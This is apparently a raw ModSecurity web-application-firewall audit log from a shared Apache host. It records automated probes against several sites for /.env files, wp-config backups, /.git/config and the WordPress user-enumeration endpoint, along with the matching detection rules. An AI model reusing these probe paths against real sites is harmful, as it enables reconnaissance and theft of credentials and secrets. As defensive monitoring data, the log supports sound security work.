proxy:unix:/var/www/vhosts/system/vivacetrading.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753312520094951 113442 (- - -) Stopwatch2: 1753312520094951 113442; combined=3016, p1=719, p2=2196, p3=0, p4=0, p5=100, sr=226, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d2fa4162-Z-- --aafbb86d-A-- [24/Jul/2025:02:22:56.190009 +0300] aIFuzVooLYw4or2LgWIl3wAAANc 85.204.70.114 39078 127.0.0.1 7081 --aafbb86d-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: glamilea.com X-Real-IP: 85.204.70.114 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: yay_currency_widget=29035 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --aafbb86d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.33 X-Robots-Tag: noindex Link: <https://glamilea.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Upgrade: h2,h2c Connection: Upgrade, close Content-Type: application/json; charset=UTF-8 --aafbb86d-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||glamilea.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||glamilea.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "glamilea.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aIFuzVooLYw4or2LgWIl3wAAANc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/glamilea.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753312973995973 2194192 (- - -) Stopwatch2: 1753312973995973 2194192; combined=3066, p1=436, p2=2472, p3=0, p4=0, p5=157, sr=122, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aafbb86d-Z-- --f6c9f833-A-- [24/Jul/2025:02:39:42.915323 +0300] aIFyvlooLYw4or2LgWJE_AAAANU 124.198.131.107 54980 127.0.0.1 7081 --f6c9f833-B-- GET /.env HTTP/1.0 Host: 41.128.143.88 X-Real-IP: 124.198.131.107 X-Accel-Internal: /internal-nginx-static-location Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,fr;q=0.8 --f6c9f833-F-- HTTP/1.1 421 Misdirected Request Content-Length: 386 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6c9f833-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.88"] [uri "/.env"] [unique_id "aIFyvlooLYw4or2LgWJE_AAAANU"] Apache-Error: [file "ssl_engine_kernel.c"] [line 325] [level 3] AH02032: Hostname default-41_128_143_86 (default host as no SNI was provided) and hostname 41.128.143.88 provided via HTTP have no compatible SSL setup Stopwatch: 1753313982913917 1517 (- - -) Stopwatch2: 1753313982913917 1517; combined=774, p1=619, p2=0, p3=33, p4=33, p5=89, sr=189, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f6c9f833-Z-- --f320b700-A-- [24/Jul/2025:02:39:43.830274 +0300] aIFyv1ooLYw4or2LgWJFDwAAAM4 124.198.131.107 55158 127.0.0.1 7081 --f320b700-B-- GET /.env.bak HTTP/1.0 Host: 41.128.143.88 X-Real-IP: 124.198.131.107 X-Accel-Internal: /internal-nginx-static-location Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,fr;q=0.8 --f320b700-F-- HTTP/1.1 421 Misdirected Request Content-Length: 386 Connection: close Content-Type: text/html; charset=iso-8859-1 --f320b700-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.88"] [uri "/.env.bak"] [unique_id "aIFyv1ooLYw4or2LgWJFDwAAAM4"] Apache-Error: [file "ssl_engine_kernel.c"] [line 325] [level 3] AH02032: Hostname default-41_128_143_86 (default host as no SNI was provided) and hostname 41.128.143.88 provided via HTTP have no compatible SSL setup Stopwatch: 1753313983828933 1443 (- - -) Stopwatch2: 1753313983828933 1443; combined=734, p1=586, p2=0, p3=32, p4=33, p5=83, sr=187, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f320b700-Z-- --e1bfe078-A-- [24/Jul/2025:02:39:51.261195 +0300] aIFyx1ooLYw4or2LgWJFeAAAAME 124.198.131.107 56412 127.0.0.1 7081 --e1bfe078-B-- GET /wp-config.old HTTP/1.0 Host: 41.128.143.88 X-Real-IP: 124.198.131.107 X-Accel-Internal: /internal-nginx-static-location Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,fr;q=0.8 --e1bfe078-F-- HTTP/1.1 421 Misdirected Request Content-Length: 386 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1bfe078-H-- Message: Warning. Matched phrase "wp-config.old" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.88"] [uri "/wp-config.old"] [unique_id "aIFyx1ooLYw4or2LgWJFeAAAAME"] Apache-Error: [file "ssl_engine_kernel.c"] [line 325] [level 3] AH02032: Hostname default-41_128_143_86 (default host as no SNI was provided) and hostname 41.128.143.88 provided via HTTP have no compatible SSL setup Stopwatch: 1753313991259874 1543 (- - -) Stopwatch2: 1753313991259874 1543; combined=862, p1=706, p2=0, p3=34, p4=33, p5=88, sr=210, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e1bfe078-Z-- --9dc51b6d-A-- [24/Jul/2025:02:39:55.018433 +0300] aIFyy1ooLYw4or2LgWJFqwAAANM 124.198.131.107 42504 127.0.0.1 7081 --9dc51b6d-B-- GET /wp-config.php.bak HTTP/1.0 Host: 41.128.143.88 X-Real-IP: 124.198.131.107 X-Accel-Internal: /internal-nginx-static-location Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,fr;q=0.8 --9dc51b6d-F-- HTTP/1.1 421 Misdirected Request Content-Length: 386 Connection: close Content-Type: text/html; charset=iso-8859-1 --9dc51b6d-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.88"] [uri "/wp-config.php.bak"] [unique_id "aIFyy1ooLYw4or2LgWJFqwAAANM"] Apache-Error: [file "ssl_engine_kernel.c"] [line 325] [level 3] AH02032: Hostname default-41_128_143_86 (default host as no SNI was provided) and hostname 41.128.143.88 provided via HTTP have no compatible SSL setup Stopwatch: 1753313995017402 1138 (- - -) Stopwatch2: 1753313995017402 1138; combined=586, p1=465, p2=0, p3=27, p4=29, p5=65, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9dc51b6d-Z-- --a45eff60-A-- [24/Jul/2025:02:39:55.195497 +0300] aIFyy1ooLYw4or2LgWJFrgAAAM4 124.198.131.107 42538 127.0.0.1 7081 --a45eff60-B-- GET /wp-config.txt HTTP/1.0 Host: 41.128.143.88 X-Real-IP: 124.198.131.107 X-Accel-Internal: /internal-nginx-static-location Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,fr;q=0.8 --a45eff60-F-- HTTP/1.1 421 Misdirected Request Content-Length: 386 Connection: close Content-Type: text/html; charset=iso-8859-1 --a45eff60-H-- Message: Warning. Matched phrase "wp-config.txt" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "wp-config.txt" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.88"] [uri "/wp-config.txt"] [unique_id "aIFyy1ooLYw4or2LgWJFrgAAAM4"] Apache-Error: [file "ssl_engine_kernel.c"] [line 325] [level 3] AH02032: Hostname default-41_128_143_86 (default host as no SNI was provided) and hostname 41.128.143.88 provided via HTTP have no compatible SSL setup Stopwatch: 1753313995193882 1745 (- - -) Stopwatch2: 1753313995193882 1745; combined=1199, p1=608, p2=0, p3=35, p4=30, p5=525, sr=158, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a45eff60-Z-- --67ef4a52-A-- [24/Jul/2025:02:39:55.495582 +0300] aIFyy0dutIOpb_kg22jdsQAAABU 124.198.131.107 42596 127.0.0.1 7081 --67ef4a52-B-- GET /wp-config.php.backup HTTP/1.0 Host: 41.128.143.88 X-Real-IP: 124.198.131.107 X-Accel-Internal: /internal-nginx-static-location Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,fr;q=0.8 --67ef4a52-F-- HTTP/1.1 421 Misdirected Request Content-Length: 386 Connection: close Content-Type: text/html; charset=iso-8859-1 --67ef4a52-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.88"] [uri "/wp-config.php.backup"] [unique_id "aIFyy0dutIOpb_kg22jdsQAAABU"] Apache-Error: [file "ssl_engine_kernel.c"] [line 325] [level 3] AH02032: Hostname default-41_128_143_86 (default host as no SNI was provided) and hostname 41.128.143.88 provided via HTTP have no compatible SSL setup Stopwatch: 1753313995494185 1508 (- - -) Stopwatch2: 1753313995494185 1508; combined=759, p1=583, p2=0, p3=34, p4=34, p5=107, sr=168, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --67ef4a52-Z-- --3a330a68-A-- [24/Jul/2025:02:54:46.336674 +0300] aIF2RlooLYw4or2LgWJcigAAAMA 149.22.80.116 35410 127.0.0.1 7081 --3a330a68-B-- GET /.env HTTP/1.0 Host: jinansystem.com X-Real-IP: 149.22.80.116 X-Accel-Internal: /internal-nginx-static-location Connection: close referer: http://jinansystem.com/.env accept-encoding: gzip user-agent: Go-http-client/2.0 --3a330a68-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --3a330a68-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "jinansystem.com"] [uri "/.env"] [unique_id "aIF2RlooLYw4or2LgWJcigAAAMA"] Stopwatch: 1753314886331678 5142 (- - -) Stopwatch2: 1753314886331678 5142; combined=3007, p1=685, p2=2177, p3=0, p4=0, p5=144, sr=171, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3a330a68-Z-- --ca5f5c68-A-- [24/Jul/2025:03:26:34.478941 +0300] aIF9ulooLYw4or2LgWKcXgAAANg 185.177.72.24 49068 127.0.0.1 7081 --ca5f5c68-B-- GET /.git/config HTTP/1.0 Host: vivacetrading.com X-Real-IP: 185.177.72.24 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; MI 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.42 Mobile Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --ca5f5c68-F-- HTTP/1.1 200 OK Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 586 Content-Type: text/html; charset=UTF-8 --ca5f5c68-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "vivacetrading.com"] [uri "/.git/config"] [unique_id "aIF9ulooLYw4or2LgWKcXgAAANg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/vivacetrading.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753316794450634 28466 (- - -) Stopwatch2: 1753316794450634 28466; combined=3738, p1=1436, p2=2151, p3=0, p4=0, p5=151, sr=218, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ca5f5c68-Z-- --b253370f-A-- [24/Jul/2025:03:28:41.888458 +0300] aIF-OUdutIOpb_kg22gGmwAAABQ 93.123.109.101 45504 127.0.0.1 7081 --b253370f-B-- GET /.env HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 93.123.109.101 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --b253370f-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --b253370f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.jinansystem.com"] [uri "/.env"] [unique_id "aIF-OUdutIOpb_kg22gGmwAAABQ"] Stopwatch: 1753316921884109 4492 (- - -) Stopwatch2: 1753316921884109 4492; combined=2671, p1=631, p2=1955, p3=0, p4=0, p5=84, sr=199, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b253370f-Z-- --81e0f15c-A-- [24/Jul/2025:03:28:42.500563 +0300] aIF-OkdutIOpb_kg22gGngAAAAE 93.123.109.101 45580 127.0.0.1 7081 --81e0f15c-B-- GET /.env.save HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 93.123.109.101 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --81e0f15c-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --81e0f15c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.jinansystem.com"] [uri "/.env.save"] [unique_id "aIF-OkdutIOpb_kg22gGngAAAAE"] Stopwatch: 1753316922495713 4941 (- - -) Stopwatch2: 1753316922495713 4941; combined=2849, p1=596, p2=2150, p3=0, p4=0, p5=102, sr=165, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --81e0f15c-Z-- --5dc3b744-A-- [24/Jul/2025:03:28:43.076291 +0300] aIF-O1ooLYw4or2LgWKgagAAAMU 93.123.109.101 35364 127.0.0.1 7081 --5dc3b744-B-- GET /.env.prod HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 93.123.109.101 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --5dc3b744-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --5dc3b744-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.jinansystem.com"] [uri "/.env.prod"] [unique_id "aIF-O1ooLYw4or2LgWKgagAAAMU"] Stopwatch: 1753316923071497 4863 (- - -) Stopwatch2: 1753316923071497 4863; combined=2900, p1=674, p2=2151, p3=0, p4=0, p5=75, sr=164, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5dc3b744-Z-- --56bda778-A-- [24/Jul/2025:03:28:43.650191 +0300] aIF-O1ooLYw4or2LgWKgcQAAANc 93.123.109.101 35440 127.0.0.1 7081 --56bda778-B-- GET /api/.env HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 93.123.109.101 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --56bda778-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --56bda778-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.jinansystem.com"] [uri "/api/.env"] [unique_id "aIF-O1ooLYw4or2LgWKgcQAAANc"] Stopwatch: 1753316923645351 5005 (- - -) Stopwatch2: 1753316923645351 5005; combined=2850, p1=667, p2=2039, p3=0, p4=0, p5=143, sr=229, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --56bda778-Z-- --9e604909-A-- [24/Jul/2025:03:28:44.080043 +0300] aIF-PEdutIOpb_kg22gGqgAAABg 93.123.109.101 35504 127.0.0.1 7081 --9e604909-B-- GET /dev/.env HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 93.123.109.101 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --9e604909-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --9e604909-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.jinansystem.com"] [uri "/dev/.env"] [unique_id "aIF-PEdutIOpb_kg22gGqgAAABg"] Stopwatch: 1753316924071463 8649 (- - -) Stopwatch2: 1753316924071463 8649; combined=6195, p1=1029, p2=5095, p3=0, p4=0, p5=71, sr=169, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9e604909-Z-- --cd9ff261-A-- [24/Jul/2025:03:46:24.674315 +0300] aIGCYEdutIOpb_kg22gXmQAAAAs 181.41.206.179 38952 127.0.0.1 7081 --cd9ff261-B-- GET /.env HTTP/1.0 Host: haddadjewellery.com X-Real-IP: 181.41.206.179 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --cd9ff261-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 21 Jan 2025 14:39:31 GMT ETag: "328-62c38584f0049" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --cd9ff261-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "haddadjewellery.com"] [uri "/.env"] [unique_id "aIGCYEdutIOpb_kg22gXmQAAAAs"] Stopwatch: 1753317984669545 4858 (- - -) Stopwatch2: 1753317984669545 4858; 